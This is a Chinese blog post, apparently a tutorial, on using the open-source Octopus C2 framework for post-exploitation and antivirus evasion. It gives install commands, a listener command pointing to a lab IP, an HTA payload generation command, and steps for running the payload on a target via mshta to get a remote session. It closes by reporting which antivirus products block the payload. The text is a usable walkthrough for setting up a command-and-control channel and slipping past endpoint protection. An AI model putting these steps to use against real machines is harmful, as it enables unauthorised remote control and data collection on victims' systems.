免杀!利用开源的Octopus进行后渗透

前言

这几天看到一个开源的c2,据说可以免杀。特地来试试。测试机装了火绒杀毒和360安全卫士。


项目地址

https://github.com/mhaskar/Octopus

介绍

Octopus是基于python3的开源项目,可进行操作的C2服务器,可以通过HTTP / S控制Octopus powershell代理。

创建Octopus的主要目的是要在任何红队作战之前使用,而无需开始与您的整个作战武库和基础设施接触,您可以先使用八达通来攻击目标并收集信息,然后再开始实际的红队作战而无需使您的实际基础架构面临风险!

Octopus中的一项很酷的功能称为ESA,它表示“端点态势感知”,它将收集有关目标的一些重要信息,这些信息将帮助您更好地了解您在操作过程中将面对的目标网络端点。您可以根据此信息自定义您的实际操作。

Octopus旨在与C2进行通信时隐秘而隐秘,因为它在Powershell代理和C2服务器之间的加密通道默认使用AES-256。您还可以通过为您的域提供有效的证书并配置Octopus C2服务器以使用它来选择使用SSL / TLS。

特点

  • 通过HTTP / S的控制代理。
  • 执行系统命令。
  • 下载/上传文件。
  • 加载外部Powershell模块。
  • 在C2和代理之间使用加密的通道(AES-256)。
  • 使用不显眼的技术执行命令并传输结果。
  • 为每个目标创建自定义侦听器和多个侦听器。
  • 生成不同类型的payload。
  • 支持Powershell 2.0及更高版本的所有Windows版本。
  • 在不触摸powershell.exe进程的情况下运行Octopus Windows可执行代理。
  • 从端点自动收集信息(端点态势感知)功能。

  • 安装

    1先把项目glone下来

    <code>git clone https://github.com/mhaskar/Octopus.git/<code>

    2下载需要用的包

    <code>pip install -r requirements.txt/<code>

    3Octopus依赖于mono-csc件来编译C#源代码,您可以通过以下命令安装

    <code>apt install mono-devel/<code>

    4启动Octopus

    <code>python3 octopus.py/<code>


    免杀!利用开源的Octopus进行后渗透


    使用


    下面简单演示一下listen_http

    创建一个监听,输入listen_http可以看到全部参数

    <code>listen_http 0.0.0.0 8080 192.168.43.231 5 1.php listener1/<code>


    免杀!利用开源的Octopus进行后渗透

    生成一个hta

    <code>generate_hta listener1/<code>


    免杀!利用开源的Octopus进行后渗透

    在靶机利用mshta执行hta(mshta是什么之前文章有讲过)


    免杀!利用开源的Octopus进行后渗透

    即可收到反弹的session


    免杀!利用开源的Octopus进行后渗透

    利用interact命令开始交互


    免杀!利用开源的Octopus进行后渗透

    试一试report命令


    免杀!利用开源的Octopus进行后渗透

    最后测试得出,火绒会拦截。360好废!


    免杀!利用开源的Octopus进行后渗透


    更多姿势自行探索


    分享到:


    相關文章: